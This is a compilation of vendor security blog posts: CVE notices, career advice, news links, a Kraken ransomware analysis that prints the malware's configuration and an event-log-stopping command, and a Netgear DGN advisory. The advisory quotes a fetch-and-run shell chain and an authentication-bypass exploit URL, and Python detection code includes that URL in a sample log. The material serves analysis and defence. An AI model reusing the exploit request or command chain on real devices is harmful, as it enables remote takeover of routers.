CVE-2018-8530 Microsoft Edge Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8531 Azure IoT Device Client SDK Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8532 SQL Server Management Studio Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8533 SQL Server Management Studio Information Disclosure Vulnerability
There are no known exploits in the wild.

How to Stop Malware-Created Backdoors

Hackers have been placing backdoors into systems for years for a variety of purposes. We have all read the stories about backdoors being installed in retailers to siphon payment card information; a PCI DSS and reputation nightmare.

Backdoors have also been deployed in government and higher education institutions to gather intellectual property, such as defense and trade secrets. Medical institutions pay out settlements every year due to HIPAA violations caused by these forms of malware.

A perfect example of a backdoor-creating malware is Calisto. This backdoor trojan is designed for macOS (many executives use Macs) and attempts to install itself in different folders until it finds a home, and then enables accessibility authorization.

If this can be accomplished, it will open a backdoor for the hacker to control the entire system. In most cases, this malware fails (due to protections placed on new Macs) but can leave behind system vulnerabilities.

So, how do you stop such an aggressive form of malware? It’s important to know that not all trojans are alike.

Some create a customized payload every time they land on a new system, so that signatures written for earlier samples do not block later ones. SonicWall stops known backdoors on our next-generation firewalls (NGFW) and can test and find new versions of backdoor malware with the Capture Advanced Threat Protection (ATP) sandbox service.

But for threats that land on the endpoint, the key is using advanced artificial intelligence (AI) that can detect the malware’s presence on the endpoint. Does it try to bypass antivirus? Does it embed itself in a directory it shouldn’t? Does it attempt to download something from a command and control (C&C) server? These are just some of the ways Calisto can be identified.

To properly stop Calisto and other backdoor-building malware, download the exclusive tech brief: Protecting macOS Endpoints from Calisto. The brief will explore:

  • Origin of Calisto
  • Why SIP enablement is not enough
  • How the malware delivers its payload
  • Secondary steps the malware will take to ensure execution
  • Proven solutions for stopping Calisto


Tips for Getting a Job in Cybersecurity

It’s been a much-publicized issue for years: the cybersecurity skills gap. Not enough talented security pros. Way too many critical cybersecurity jobs. It’s becoming such a challenge that it’s even part of the U.S. government’s new National Cyber Strategy.

“The Administration will work with the Congress to promote and reinvigorate educational and training opportunities to develop a robust cybersecurity workforce,” notes the official strategy document. “This includes expanding Federal recruitment, training, re-skilling people from a broad range of backgrounds, and giving them opportunities to re-train into cybersecurity careers.”

The perplexing fact of this challenge is that it’s not always clear how to get a job in the cybersecurity field. Want to become an electrician? Go to trade school. Want to become a doctor? Attend medical school. A lawyer? Study hard and pass the bar exam.

But pursuing a future in cybersecurity isn’t always as straightforward, particularly for those new to the field. There are many paths to take, but it’s often fraught with complexity and uncertainty.

A Critical Problem: Not Enough Cybersecurity Talent

As of March 2018, there were more than 300,000 unfilled cybersecurity jobs in the U.S. alone. California, Texas and Virginia represented the top geographies for open cybersecurity roles.

This skills gap is predicted to widen to 3.5 million jobs by 2021, a major supply-and-demand challenge for one of the most critical threat landscapes. The growing disparity opens the door for all types of job-seekers: entry-level candidates, seasoned professionals, career-changers and executives alike.

“The demand for cybersecurity professionals is accelerating at such a pace that we can’t hire qualified and experienced talent fast enough,” said SonicWall Global Human Resources Director Bryce Ashcraft. “These are exciting, highly rewarding career fields, so it represents amazing opportunity for individuals interested in computer science, information technology, threat analysis and forensics — the list goes on and on.”

The Call for More Women in Cybersecurity

One of the many reasons for the cybersecurity skills gap is the gender disproportion in the industry. Data from the last few years estimated that women comprised 11 percent of the cyber workforce. One new source states that women represent 20 percent of the field — a stark improvement. But more change is still needed.

This issue was never more apparent than at RSA, North America’s largest cybersecurity conference hosted annually in San Francisco. Organizers of RSA 2018 actually came under fire for the lack of female panelists and speakers for the event, a story which was documented by SonicWall in, “The Shortest Line at RSA Conference 2018: Where are all the Women?”

Fortunately, pro-women organizations are growing quickly. Events, conferences and scholarships have been created across the world to empower women to prepare for careers in cybersecurity.

Organizations

  • WiCyS Women in CyberSecurity
  • Women in Security and Privacy
  • National Center for Women & Information Technology
  • SWE – Society of Women Engineers
  • She Secures
  • Women in Defense (WID)
  • Women’s Security Society (WSS)

Conferences & Events

  • WiCyS Women in CyberSecurity
  • Grace Hopper Celebration
  • OURSA – Our Security Advocates

Scholarships

  • Raytheon’s Women Cyber Security Scholarship Program
  • (ISC)² Women’s CyberSecurity Scholarships
  • Scholarship for Women Studying Information Security

Why Veterans Are Ideal Cybersecurity Pros

Many cybersecurity vendors are tapping into a different resource: military veterans. Highly skilled and easily trained, veterans are key to helping close the cybersecurity skills gap.

Better yet, they have unique skills that aren’t always easy to find in civilian sectors. Many veterans possess the right characteristics for working in high-pressure situations, such as a real-time security operations center (SOC).

“Efficient security operations teams operate in what’s called a ‘high-op tempo’ environment,” said Wayne Reynolds, an 18-year veteran of the United States Marine Corps and current CISO of Armor, a cloud security MSSP. “Veterans live this every day they are deployed.

“Most veterans I know operate extremely well in high-stress situations. In security, as you are combatting threats, you need to keep a cool, calm view of the situation. Veterans do this extremely well.”

In some unique cases, veterans may also possess valuable security clearances that could make them attractive to companies that operate in state and federal arenas, or in matters of government or industry compliance.

If you’re not a veteran, the military is an attractive option to gain hands-on, real-world experience in related fields. Acquired skills will be highly marketable when you transition back to civilian roles.

Resources for Military Cyber Careers

Your Cybersecurity Career: How to Get Started

More than 768,000 people are employed in cybersecurity in the U.S. But hundreds of thousands of jobs remain unfilled.

Top Cybersecurity Job Titles

  • Cybersecurity Engineer
  • Cybersecurity Analyst
  • Network Engineer/Architect
  • Cybersecurity Manager/Administrator
  • Systems Engineer
  • Software Developer/Engineer
  • Vulnerability Analyst/Penetration Tester
  • Systems Administrator
  • IT Auditor

Source: CyberSeek.org

Cybersecurity represents a lucrative career path for those interested in technology, computer science, engineering, network and cloud architecture, IT management, software development, threat intelligence and cyberattack forensics.

While salaries are largely dependent on skill set, experience, industry and region, cybersecurity pay can easily exceed $200,000 (USD) per year. This is particularly achievable when professionals begin directing full SOCs or move into executive positions, like chief security officer (CSO) or chief information security officer (CISO).

But there are opportunities for many professionals, particularly those who are trainable and adept at solving problems.

“I look for two things in all candidates. First, inquisitiveness. Good security folks are big problem-solvers and are always curious,” said Reynolds. “Second, modesty. If you have an inquisitive person who is modest, you can teach them anything.”

Common Cybersecurity Career Paths

Source: CyberSeek.org

Three of the most common ways of pursuing a career in cybersecurity include formal education, certifications and, as outlined above, military service. Not every path is suited for every personality. It’s important to find a program that works for you, but be sure it includes applicable, hands-on experience as well as job-placement programs.

Cybersecurity Certification

Certifications are a common, cost-effective approach to building cybersecurity acumen. SonicWall offers an extensive training curriculum path for security experts seeking to enhance their knowledge and maximize their investment in SonicWall network security products. This practice is common for security vendors committed to training cybersecurity professionals. SonicWall’s primary certification programs are:

But certifications — CISSP, CISM, CISA, ISSA, ISACA, (ISC)², Security+, Certified Ethical Hacker, CSSP, SNSA and the like — only tell part of the story. While they demonstrate a willingness to train, many cybersecurity recruiters want to know that what has been learned can be applied to the job.

“I worry less about education and tend to stay away from folks that list a plethora of certifications,” said Reynolds. “But if I see someone with an advanced degree or multiple years in the field, I take a look. The ability to practically apply education is critical.”

Cybersecurity Education

Universities and institutions of higher learning now offer dedicated cybersecurity curricula. For example, CyberDegrees offers an online resource that outlines top degree paths, sample coursework and tools for finding cybersecurity programs in 44 states.

“Similar to most undergraduate programs, online cybersecurity degrees typically require students to complete 120 to 126 credits,” notes U.S. News & World Report. “While there are accelerated programs, full-time students usually graduate within four years.”

Training & Educational Resources

Various government, private and non-profit organizations provide complimentary tools and resources to aid individuals in training for cybersecurity jobs. If you’re just starting your path toward a cybersecurity career or looking for a career change, leverage the below sites to help guide your path.

About Cybersecurity Awareness Month

The 15th annual National Cybersecurity Awareness Month (NCSAM) highlights user awareness among consumers, students/academia and business. NCSAM 2018 addresses specific challenges and identifies opportunities for behavioral change. It aims to remind everyone that protecting the internet is “Our Shared Responsibility.”

In addition, NCSAM 2018 will shine a spotlight on the critical need to build a strong, cyber secure workforce to help ensure families, communities, businesses and the country’s infrastructure are better protected through four key themes:

  • Oct. 1-5: Make Your Home a Haven for Online Safety
  • Oct. 8-12: Millions of Rewarding Jobs: Educating for a Career in Cybersecurity
  • Oct. 15-19: It’s Everyone’s Job to Ensure Online Safety at Work
  • Oct. 22-26: Safeguarding the Nation’s Critical Infrastructure

Learn more at StaySafeOnline.org.

Cyber Security News & Trends – 10-05-18

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.


SonicWall Spotlight

Facebook Hack: People’s Accounts Appear for Sale on Dark Web – The Independent (UK)

  • SonicWall CEO Bill Conner shares his thoughts on the fallout from the recent Facebook hack.

The A-Z of Security Threats 2018 – ITPro

  • SonicWall’s Laurence Pingree mans the letter E in this alphabet of cybersecurity threats for 2018.

100 People You Don’t Know but Should 2018 – CRN

  • Congratulations to John Mullen, included in the CRN 2018 list.

UK and Allies Accuse Russia of Cyber Attack Campaign – ComputerWeekly

  • SonicWall CEO Bill Conner encourages global co-operation following the UK National Cyber Security Centre (NCSC) directly linking Russia with cyberattacks.

Cyber Security News

National Cybersecurity Awareness Month – Official Website

  • October marks the 15th annual National Cybersecurity Awareness Month (NCSAM). Follow the activity online using the hashtags #NCSAM and #CyberAware.

The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies – Bloomberg

  • Hardware hacks are rare but, if successful, the payoff for them can be huge. Both Amazon and Apple may have been the victim of such a hack.

Meet Torii, a New IoT Botnet Far More Sophisticated Than Mirai Variants – ZDNet

  • A very sophisticated Internet of Things botnet has been found and experts are impressed, “The author is not your average script kiddie.”

BUPA Fined $228,000 After Stolen Data Surfaces on Dark Web – BankInfoSecurity

  • British data-protection regulators are taking a dim view of companies who are not exercising good cybersecurity practices.

Gwinnett Medical Center Investigates Possible Data Breach – ZDNet

  • A security incident has led to a possible leak of patient information online.

Facebook Hack Puts Thousands of Other Sites at Risk – The New York Times

  • The Facebook hack has major implications for any site that uses Facebook as a login tool.

Malware Scam Targets Fortnite Cheaters and Their Bitcoin Wallets – CNET

  • If you’re looking to cheat at Fortnite then you are at risk of being cheated yourself.

In Case You Missed It

Kraken 1.52 Ransomware served by compromised Anti Spyware site

The SonicWall Capture Labs Threat Research Team has recently been tracking a new ransomware family known as Kraken. This ransomware has reportedly been served by a compromised anti-spyware site, superantispyware.com. The operators demand 0.75 BTC for file decryption and are quick to tell you not to waste their time if you are not serious.

Infection Cycle:

The malware executable file contains the following metadata:

Upon infection, the trojan encrypts files on the system and drops # How to Decrypt Files.html into every directory containing encrypted files. # How to Decrypt Files.html contains the following HTML page:

Encrypted files are named <numericvalue>-lock.onion, e.g. 00000001-lock.onion, 00000002-lock.onion, etc. The numeric value is incremented for each file encrypted.

The trojan makes a DNS request to ipinfo.io and obtains the victim’s external IP address. Apart from this, there is no other network traffic.

Upon inspecting the malware executable file, we came across an embedded configuration file. This suggests that it may be generated from a ransomware creation kit. The configuration file contains the following data in JSON format:


"project":{
    "name":"kraken",
    "version":1.52,
    "comment":"When the researchers party hard, our parties harder!"
},

"module":{
    "anti_forensic":true,
    "anti_revere":true,
    "anti_virtual": false,
    "anti_smb":false,
    "anti_rdp":false,
    "country_check":true,
    "keyboard_check":true,
    "registry_check":true,
    "fix_device":true,
    "network_device":true,
    "flash_device":true,
    "extension_bypass":true,
    "rapid_mode":true
},

"core": {
    "public_key": "2kHjgBUx6QQSkwRnLs5c/AdbjroDU4j5AanCabrpjBLnKCWGKwmlWQZR/
    RcCRF5KyAfMmPIks1JYEvh9bMh1Mv1CvbofBi4/HAttuictsmiVSRvMxRNDw3U29W0Li/PoSOYfBPUvHP58BhLTt3G5/
    AikhhHmf4FGtigUEkq5n/u60Zh0362s2nY1Ev0qEx+d45oDnYaoMIlihrcxtho7uqbu1sZPsgezzyEBl7f2BKOjXxD4ML8Cpwv69EHH
    +3tgt2gn9ys921NI3d3gjI8Z+GRSYnKNx1qRCoiCPQqL6MjUHEEOXkMOWITh/CacwQDMEEn2SlxDDisLvybdjw9y1Q==",
    "support_email_1": "onionhelp@memeware.net",
    "support_email_2": "BM-2cWdhn4f5UyMvruDBGs5bK77NsCFALMJkR@bitmessage.ch",
    "price": 0.75,
    "price_unit": "BTC",
    "new_extension": "onion",
    "main_cipher_key_size": 128,
    "session_cipher_key_size": 64,
    "aes_cipher_key_size": 32,


The configuration contains the following files and directories to be skipped:

"skip_files": [
    "bootsect.bak",
    "desktop.ini",
    "iconcache.db",
    "ntuser.dat",
    "thumbs.db"
],

"skip_directories": [
    "$recycle.bin",
    "system volume information",
    "$windows.~bt",
    "boot",
    "drivers",
    "programdata",
    "all users",
    "windows",
    "windows.old",
    "appdata",
    "programdata",
    "sample videos",
    "sample pictures",
    "sample music",
    "my videos",
    "my pictures",
    "my music",
    "test folder"
],


It will also kill the following processes if running:

"process_stop": [
    "agntsvcagntsvc",
    "agntsvcencsvc",
    "agntsvcisqlplussvc",
    "dbeng50",
    "dbsnmp",
    "firefoxconfig",
    "msftesql",
    "mydesktopqos",
    "mydesktopservice",
    "mysqld",
    "mysqld-nt",
    "mysqld-opt",
    "ocomm",
    "ocssd",
    "oracle",
    "sqbcoreservice",
    "sqlagent",
    "sqlbrowser",
    "sqlservr",
    "sqlwriter",
    "sqlwb",
    "synctime",
    "tbirdconfig",
    "xfssvccon"
],

The configuration has a “target_extensions” section. Files with the following extensions will be encrypted:

1cd 3dm 3ds 3fr 3g2 3gp 3pr 7z 7zip aac ab4 abd accdb accde accdr accdt ach acr act adb adp
ads agdl ai aiff ait al aoi apj arw ascx asf asm asp aspx asx atb avi awg back backup backupdb
bak bank bay bdb bgt bik bin bkp blend bmp bpw c cdb cdf cdr cdr3 cdr4 cdr5 cdr6 cdrw cdx
ce1 ce2 cer cfg cfn cgm cib class cls cmt config contact cpi cpp cr2 craw crt crw cs csh cs
csl css csv dac dat db db3 dbf dbx db_journal dc2 dcr dcs ddd ddoc ddrw dds def der des design
dgc dit djvu dng doc docm docx dot dotm dotx drf drw dtd dwg dxb dxf dxg edb eml eps erbsql
erf exf fdb ffd fff fh fhd fla flac flb flf flv flvv fpx fxg gif gray grey groups gry h hbk
hdd hpp html ibank ibd ibz idx iif iiq incpas indd info info_ ini jar java jnt jpe jpeg jpg js
json kc2 kdbx kdc key kpdx kwm laccdb lck ldf lit lock log lua m m2ts m3u m4p m4v mab mapimail
max mbx md mdb mdc mdf mef mfw mid mkv mlb mmw mny moneywell mos mov mp3 mp4 mpeg mpg mrw msf
msg myd nd ndd ndf nef nk2 nop nrw ns2 ns3 ns4 nsd nsf nsg nsh nvram nwb nx2 nxl nyf oab obj
odb odc odf odg odm odp ods odt ogg oil omg orf ost otg oth otp ots ott p7b p7c p12 pab pages
pas pat pbf pcd pct pdb pdd pdf pef pem pfx php pif pl plc plus_muhd pm! pm pmi pmj pml pmm
pmo pmr pnc pnd png pnx pot potm potx ppam pps ppsm ppsm ppsx ppt pptm pptm pptx prf ps psafe3
psd pspimage pst ptx pwm py qba qbb qbm qbr qbw qbx qby qcow qcow2 qed qtb r3d raf rar rat raw
rdb rm rtf rvt rw2 rwl rwz s3db safe sas7bdat sav save say sd0 sda sdb sdf sh sldm sldx sql
sqlite sqlite-shm sqlite-wal sqlite3 sqlitedb sr2 srb srf srs srt srw st4 st5 st6 st7 st8 stc
std sti stm stw stx svg swf sxc sxd sxg sxi sxm sxw tbb tbn tex tga thm tlg tlx txt usr vbox
vdi vhd vhdx vmdk vmsd vmx vmxf vob wab wad wallet war wav wb2 wma wmf wmv wpd wps x3f x11 xis
xla xlam xlk xlm xlr xls xlsb xlsm xlsx xlt xltm xltx xlw xml ycbcra yuv zip

The Trojan attempts to stop the event log service by issuing the command “sc stop eventlog”:

We had the following conversation with the operator via email. The operator demands 0.75 BTC ($4,923 USD) for file recovery:
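The recovered configuration is useful beyond attribution: during incident response it tells you which files on a host were in scope and which the ransomware deliberately skipped. The triage helper below is an added example, not SonicWall's code; it embeds a subset of the configuration quoted above (the full target_extensions list is much longer), uses the <numericvalue>-lock.onion naming scheme and the ransom-note filename to spot already-encrypted files, and assumes, since the post does not say, that skip_directories is matched case-insensitively against any directory component of a path.

```python
import json
import re
from pathlib import PureWindowsPath

# Subset of the embedded Kraken 1.52 configuration quoted in the post. Key names and
# values are copied from the page; target_extensions is cut down to a few entries.
KRAKEN_CONFIG = json.loads("""
{
  "core": {"new_extension": "onion"},
  "skip_files": ["bootsect.bak", "desktop.ini", "iconcache.db", "ntuser.dat", "thumbs.db"],
  "skip_directories": ["$recycle.bin", "system volume information", "$windows.~bt", "boot",
                       "drivers", "programdata", "all users", "windows", "windows.old",
                       "appdata", "my videos", "my pictures", "my music", "test folder"],
  "target_extensions": ["doc", "docx", "xls", "xlsx", "pdf", "jpg", "sql", "mdf", "vmdk", "zip"]
}
""")

RANSOM_NOTE = "# How to Decrypt Files.html"   # dropped into every directory with encrypted files


def encrypted_name_pattern(config):
    """Encrypted files are renamed <numericvalue>-lock.<new_extension>, counter incremented per file."""
    return re.compile(r"^\d+-lock\." + re.escape(config["core"]["new_extension"]) + "$", re.IGNORECASE)


def would_be_targeted(path, config=KRAKEN_CONFIG):
    """True if the recovered config puts this file in scope for encryption.

    Assumption (not stated in the post): skip_directories is compared against every
    directory component of the path, and all comparisons are case-insensitive.
    """
    p = PureWindowsPath(path)
    if p.name.lower() in config["skip_files"]:
        return False
    parents = {part.lower() for part in p.parts[:-1]}
    if parents & set(config["skip_directories"]):
        return False
    return p.suffix.lstrip(".").lower() in config["target_extensions"]


def triage(paths, config=KRAKEN_CONFIG):
    """Split a host file listing into encrypted files, ransom notes and files still at risk."""
    encrypted_re = encrypted_name_pattern(config)
    result = {"encrypted": [], "notes": [], "at_risk": []}
    for path in paths:
        name = PureWindowsPath(path).name
        if encrypted_re.match(name):
            result["encrypted"].append(path)
        elif name == RANSOM_NOTE:
            result["notes"].append(path)
        elif would_be_targeted(path, config):
            result["at_risk"].append(path)
    return result


# Constructed sample listing from a partly encrypted host (not taken from the post).
SAMPLE_PATHS = [
    r"C:\Users\alice\Documents\00000001-lock.onion",
    r"C:\Users\alice\Documents\00000002-lock.onion",
    r"C:\Users\alice\Documents\# How to Decrypt Files.html",
    r"C:\Users\alice\Pictures\holiday.jpg",            # in scope, not yet encrypted
    r"C:\Users\alice\AppData\Roaming\notes.docx",      # skipped: "appdata" directory
    r"C:\Users\alice\desktop.ini",                     # skipped: listed in skip_files
    r"C:\Windows\System32\drivers\etc\hosts",          # skipped: "windows" / "drivers"
    r"D:\backups\db.mdf",                              # in scope
    r"D:\backups\setup.exe",                           # exe is not a targeted extension
]

if __name__ == "__main__":
    for bucket, items in triage(SAMPLE_PATHS).items():
        print(f"{bucket}: {len(items)}")
        for item in items:
            print("   ", item)
```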

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Kraken.RSM (Trojan)
  • GAV: Kraken.RSM_2 (Trojan)
  • GAV: KrakenCryptor.KJ (Trojan)

Massive IOT attack targeting unpatched Netgear devices

SonicWall Threat Research Lab has recently spotted a massive IoT attack attempting to exploit a remote code execution vulnerability in Netgear DGN series routers. It seems to have started over the weekend, and the detection rate has been spiking for the last few days. We observed over 100,000 attacks coming from different IP addresses to exploit ~7000 firewalls.

Vulnerability | NETGEAR DGN Unauthenticated Remote Command Execution:

The vulnerability is due to insufficient validation of the user input within the setup.cgi script. An attacker could exploit the vulnerability by sending a crafted HTTP request. Processing such a request could allow a remote attacker to execute arbitrary commands with root privileges.

Additionally, the web server skips authentication checks for URLs containing the substring “currentsetting.htm”. Attackers can leverage this vulnerability to bypass existing authentication. The “setup.cgi” page can then be exploited by an unauthenticated remote attacker to execute arbitrary commands with root privileges.

Netgear DGN1000 devices with firmware versions prior to 1.1.00.48 and Netgear DGN2200 version 1 are affected by this vulnerability.

Exploit:

The attacker scans ports 8080 and 80 by initiating a socket connection. If a connection is made, an exploit attempt is made.

Below is the HTTP request sent to Netgear routers.

Basically this URL leverages the “syscmd” function of the “setup.cgi” script to execute arbitrary commands. In the example above the command being executed is “wget http://localhost/netgear.sh -O /var/tmp/netgear.sh; chmod 777 /var/temp/netgear.sh; /var/tmp/netgear.sh; /var/tmp/netgear.sh; rm -rf /var/tmp/netgear.sh”. It downloads a malicious shell script to /var/tmp/, changes the file permissions to allow execution, executes the script and then forcibly deletes it with rm -rf. The output of the command is sent to the attacker in the resulting web page. With currentsetting.htm=1 appended to the URL, an unauthenticated remote attacker can bypass authentication to execute the command.

If the exploitation is successful, it is possible that the infected routers could be used as bots or as crypto-coin mining zombies.
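The two conditions described above, a “currentsetting.htm” token riding inside a setup.cgi request and a “syscmd” call in its query, are enough to pick exploit attempts out of a router’s or upstream proxy’s access log and to count how many distinct sources are hitting you. The scanner below is an added example, not SonicWall’s signature logic; the log lines are constructed with RFC 5737 documentation addresses, and the query keys in the first line are simplified rather than copied from a real exploit.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Common-log-format line: source IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

# Fragments of the command chain the post observed in the wild; any one of them inside a
# syscmd call marks the request as carrying a shell payload rather than a bare probe.
SHELL_HINTS = ("wget ", "chmod ", "/var/tmp", "rm -rf", ";")


def classify_request(url):
    """Return the indicators found in one request URL (empty list when none apply)."""
    parts = urlsplit(url)
    path = parts.path.lower()
    query = unquote_plus(parts.query).lower()
    indicators = []
    if not path.endswith("/setup.cgi"):
        return indicators
    # The DGN web server skips authentication for any URL containing "currentsetting.htm";
    # that substring inside a setup.cgi query is the bypass, not a legitimate page fetch.
    if "currentsetting.htm" in query:
        indicators.append("auth_bypass_token")
    # setup.cgi's "syscmd" function runs the supplied string as a root shell command.
    if "syscmd" in query:
        indicators.append("syscmd_call")
        if any(hint in query for hint in SHELL_HINTS):
            indicators.append("shell_payload")
    return indicators


def scan_log(text):
    """Parse log lines and return (source_ip, url, indicators) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        indicators = classify_request(m["url"])
        if indicators:
            hits.append((m["ip"], m["url"], indicators))
    return hits


def distinct_sources(hits):
    """Number of distinct source IPs; a large count is the botnet signature the post describes."""
    return len({ip for ip, _, _ in hits})


# Constructed sample access log (not taken from the post). Line 1 carries the same command
# chain the post quotes; line 4 is a bypass probe without a payload; the rest are benign.
SAMPLE_LOG = """\
203.0.113.10 - - [02/Oct/2018:10:15:01 +0000] "GET /setup.cgi?syscmd=wget+http://localhost/netgear.sh+-O+/var/tmp/netgear.sh;chmod+777+/var/tmp/netgear.sh&currentsetting.htm=1 HTTP/1.1" 200 512
198.51.100.7 - - [02/Oct/2018:10:15:09 +0000] "GET /currentsetting.htm HTTP/1.1" 200 231
192.0.2.44 - - [02/Oct/2018:10:16:30 +0000] "POST /setup.cgi?todo=save HTTP/1.1" 401 0
192.0.2.44 - - [02/Oct/2018:10:16:31 +0000] "GET /setup.cgi?syscmd=id&currentsetting.htm=1 HTTP/1.1" 200 64
203.0.113.10 - - [02/Oct/2018:10:17:02 +0000] "GET /syscmd_help.html HTTP/1.1" 404 0
"""

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for ip, url, indicators in hits:
        print(ip, indicators, url[:60])
    print("distinct attacking sources:", distinct_sources(hits))
```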

Trend Chart:

The trend line below shows how this vulnerability is being exploited in the wild.


Heat Map:

This attack hit nearly 75 countries, with most hits observed in the United States and India.


Patch:

Netgear has released firmware updates that fix the unauthenticated remote code execution vulnerability for all affected products.

Upgrade the Netgear software to DGN1000 1.1.00.48 / DGN2200 v3 or higher.

Visit the NETGEAR Download Center to download the latest firmware for your Netgear product.


SonicWall Threat Research Lab provides protection against this exploit with the following signatures:

  • IPS: 13034 NETGEAR DGN Devices Remote Command Execution
  • IPS: 13632 NETGEAR DGN Devices Remote Command Execution 2
  • WAF: 9009 Unauthorized Remote File Access
  • WAF: 9012 System Command Injection Variant 2